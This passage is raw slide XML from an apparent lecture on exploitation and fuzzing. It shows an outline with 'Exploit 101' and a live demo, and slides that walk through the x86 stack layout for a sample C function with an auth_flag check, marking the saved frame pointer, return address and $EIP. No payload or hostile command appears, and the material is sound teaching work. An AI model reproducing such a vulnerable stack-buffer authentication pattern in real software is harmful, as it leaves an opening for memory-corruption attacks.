          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="3904249" x="1686075"/>
            <a:ext cy="19800" cx="575400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207" name="Shape 207"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2513000" x="8205050"/>
            <a:ext cy="307499" cx="882899"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="208" name="Shape 208"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="207" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="2666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x86 Stack Details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Shape 21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Many debuggers display the stack this way:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(the HAOE book also does it this way)</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sz="1400" lang="en"/>
              <a:t>int function(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="1400" lang="en"/>
              <a:t>char *buf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="1400" lang="en"/>
              <a:t>int var1 = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="1400" lang="en"/>
              <a:t>return auth_flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>int main(int argc, char *argv[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  if(function(argv[1]) )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>	  // do something</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Shape 215"/>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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>buf2</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var1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>saved frame pointer (SFP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a: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t>return address (ret)</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*buf (function's argument)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a: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SzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Shape 216"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6295550" x="4754739"/>
            <a:ext cy="354000" cx="1448099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[high memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Shape 217"/>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
        <p:nvSpPr>
          <p:cNvPr id="218" name="Shape 218"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3963237" x="2253575"/>
            <a:ext cy="323099" cx="2238600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$EIP is here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="219" name="Shape 219"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="218" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="4124787" x="1678175"/>
            <a:ext cy="19800" cx="575400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Shape 220"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2513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21" name="Shape 221"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="220" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="2666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27" name="Shape 227"/>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Lets walk through how it's constructed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRP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28" name="Shape 228"/>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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:b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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a: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SzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Shape 229"/>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30" name="Shape 230"/>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
        <p:nvSpPr>
          <p:cNvPr id="231" name="Shape 231"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="53324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32" name="Shape 232"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="231" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="54861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38" name="Shape 23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Starting in main, $EIP eventually gets to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the function call</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="1400" lang="en"/>
              <a:t> if(</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" sz="1400" lang="en"/>
              <a:t>function(argv[1])</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="1400" lang="en"/>
              <a:t>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39" name="Shape 239"/>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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:b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l"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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>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rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="Shape 240"/>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41" name="Shape 241"/>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42" name="Shape 242"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="2114000" x="2327349"/>
            <a:ext cy="2807699" cx="2351400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Shape 243"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3836350" x="4041725"/>
            <a:ext cy="1635900" cx="1824600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>And the stack has no variables for the function up till this point. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Shape 244"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="53324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45" name="Shape 245"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="244" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="54861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Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Shape 9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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>Exploitation Theory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>Types of values to fuzz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>Some advanced fuzzing techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>Exploit 101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>Stack overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>Live Demo</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51" name="Shape 251"/>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The compiled assembly code will push onto </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the stack: the function parameters, the saved frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pointer, and the return address, as such</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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52" name="Shape 252"/>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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:b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l"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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>saved frame pointer (SFP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a: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t>return address (ret)</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*buf (function's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rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Shape 253"/>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54" name="Shape 254"/>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55" name="Shape 255"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="3875575" x="2382275"/>
            <a:ext cy="1337099" cx="3476099"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="256" name="Shape 256"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="4669925" x="2398000"/>
            <a:ext cy="534899" cx="3444600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="257" name="Shape 257"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="5149675" x="2405875"/>
            <a:ext cy="62999" cx="3413399"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Shape 258"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3275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59" name="Shape 259"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="258" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="3428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65" name="Shape 26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The compiled assembly code will then jump</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
